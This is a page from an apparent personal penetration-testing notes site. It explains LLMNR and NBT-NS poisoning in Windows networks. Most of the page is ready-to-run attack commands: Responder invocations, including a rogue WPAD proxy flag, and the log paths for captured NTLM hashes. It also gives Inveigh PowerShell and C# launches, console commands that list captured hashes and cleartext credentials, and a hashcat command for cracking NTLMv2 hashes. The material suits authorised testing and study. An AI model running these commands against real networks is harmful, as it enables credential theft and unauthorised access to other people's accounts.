Bibliotheque
DiscordHackTheBoxTryHackMeGitHub
  • Welcome wanderer
    • Bibliotheque
    • Hacking Philosophy
    • Useful Links
  • PENTESTING
    • Methodology
    • Protocols
      • FTP
      • SMB
      • NFS
      • SSH
      • RDP
      • SMTP
      • IMAP / POP3
      • RSYNC
      • SNMP
      • IPMI
      • R-Services
      • WinRM
      • WMI
      • LDAP
    • Databases
      • MySQL
      • MSSQL
      • Oracle TNS
      • PostgreSQL
    • File Transfers
      • Windows
      • Linux
      • Code
      • Misc
    • Password Attacks
      • John The Ripper
      • Hashcat
    • Docker
  • TOOLS
    • Nmap
    • Metasploit
    • BloodHound
    • Other
  • Linux
    • Theory
    • Commands and Utilities
      • Useful Commands
    • Bash Scripting
    • Post-Exploitation
      • Cred Hunting
      • Pivoting
  • WINDOWS
    • Theory
      • Security
    • Commands and Utilities
    • PowerShell
    • Post-Exploitation
      • Tools
      • Enumeration
        • System
        • Network
        • Users
        • Groups
        • Processes / Services
        • Permissions
        • Defence
        • Programs
        • Files
      • Access
      • Pivoting
      • Cred Hunting
    • Privilege Escalation
      • Privileges
      • Built-In Groups
        • Backup Operators
        • Server Operators
        • Print Operators
        • DnsAdmins
        • Event Log Readers
      • Privilege Abuse
        • Potatoes
        • SeDebugPrivilege
        • SeTakeOwnershipPrivilege
      • MISC
        • UAC Bypass
        • User-Interaction Attacks
        • Weak Permissions
  • ACTIVE DIRECTORY
    • Theory
      • Terminology
    • Reconnaissance
      • Responder
      • Password Policies
      • DNS
      • Enumeration
        • Users
        • Groups
          • GPO's
        • Shares
        • Domain
        • Trusts
        • ACL
    • Movement
      • Credentials
        • Dumping
          • DCSync
          • DPAPI Secrets
        • Making a Target List
        • Spraying
        • Powershell Remoting
      • Kerberos
        • Kerbrute
        • Kerberoasting
          • Semi-Manual Way
          • Targeted Kerberoasting
        • ASREProasting
        • Forging
          • Golden Ticket
        • Overpass The Hash
        • Pass The Ticket
        • RBCD
        • noPAC
      • MITM / Coerced Auths
        • LLMNR, NBT-NS Poisoning
        • PetitPotam
      • DACL Abuse
        • AddMember
        • ForceChangePassword
      • Trust Abuse
        • ExtraSIDs
      • ADCS
        • ESC1
      • Printers
        • PrintNightmare
    • Tools
  • Networking
    • Theory
      • Types / Topologies
      • OSI & TCP/IP Models
      • TCP / UDP
      • MAC Addresses
      • IP / Subnetting
      • Proxies
      • ARP
    • Pivoting
      • Port-Forwarding
    • Commands and Utilities
    • Techniques
  • WEB
    • Web Recon
      • Fuzzing
    • DNS
  • CLOUD
    • Google GKE/GCP
      • Theory
Powered by GitBook
On this page
  • ABOUT
  • RESPONDER
  • Overview
  • Running Responder
  • Common Flags
  • Capturing Hashes
  • Cracking NTLMv2 Hashes with Hashcat
  • INVEIGH
  • Overview
  • Running Inveigh (PowerShell Version)
  • Running Inveigh (C# Version)
  • Interacting with Inveigh
  • Cracking NTLMv2 Hashes with Hashcat
  1. ACTIVE DIRECTORY
  2. Movement
  3. MITM / Coerced Auths

LLMNR, NBT-NS Poisoning

ABOUT

Imagine a situation: you need to connect to some local domain, website, or SMB share. You misclicked one letter and instead of some \\mil-stash share you wrote \\mel-stash and first request goes to DNS server, but it doesn't know who the hell is \\mel-stash, so it sending a broadcast request (works same as ARP, just where ARP connects MAC to IP, LMMNR connects names to IP's). And that's the place where we come in with Responder (UNIX) or Inveigh (Windows) to poison these requests and to make target think that our IP is the right one. It tries to authenticate and sends hash which we can crack with Hashcat.

RESPONDER

MOSTLY LINUX TOOL (BUT THERE IS WIN VERSION)

Overview

Responder is a powerful tool used for LLMNR/NBT-NS poisoning, capable of capturing NTLMv1/NTLMv2 hashes from network traffic. It can operate in both Analysis (passive) mode and Poisoning (active) mode.

Running Responder

To display available options, use:

responder -h

To start Responder with default settings:

sudo responder -I ens451

Common Flags

  • -A : Analyze mode (passive monitoring without responding)

  • -I <interface> : Specify network interface

  • -w : Start WPAD rogue proxy server

Capturing Hashes

Responder listens for authentication requests and captures NTLM hashes when a target attempts to authenticate. These hashes are saved in:

/usr/share/responder/logs

Hashes are stored in the format:

(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt

Example captured log files:

SMB-NTLMv2-SSP-13.13.13.13.txt
HTTP-NTLMv2-13.13.13.13.txt

Cracking NTLMv2 Hashes with Hashcat

hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt

INVEIGH

WINDOWS TOOL

Overview

Inveigh is a PowerShell/C# tool similar to Responder, used for LLMNR, NBNS, and SMB relay attacks on Windows networks.

Running Inveigh (PowerShell Version)

Import-Module .\Inveigh.ps1
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Key Features:

  • Captures NTLM hashes via LLMNR/NBT-NS spoofing

  • Supports multiple protocols (DNS, mDNS, SMB, HTTP, LDAP, WebDAV)

  • Can output logs to a file (C:\Tools directory)

Running Inveigh (C# Version)

The C# version (Inveigh.exe) is more stable and is the recommended option.

.\Inveigh.exe

Default enabled options:

  • LLMNR & NBNS Spoofing

  • HTTP/HTTPS Authentication Capture (NTLM)

  • SMB & LDAP Listening

Interacting with Inveigh

While running Inveigh, press ESC to open the interactive console.

Useful Commands:

GET NTLMV2UNIQUE     # Display unique NTLMv2 hashes
GET NTLMV2USERNAMES  # Display captured usernames and IPs
GET CLEARTEXT        # Display captured cleartext credentials
STOP                 # Stop Inveigh

Cracking NTLMv2 Hashes with Hashcat

hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt
PreviousMITM / Coerced AuthsNextPetitPotam

Last updated 1 month ago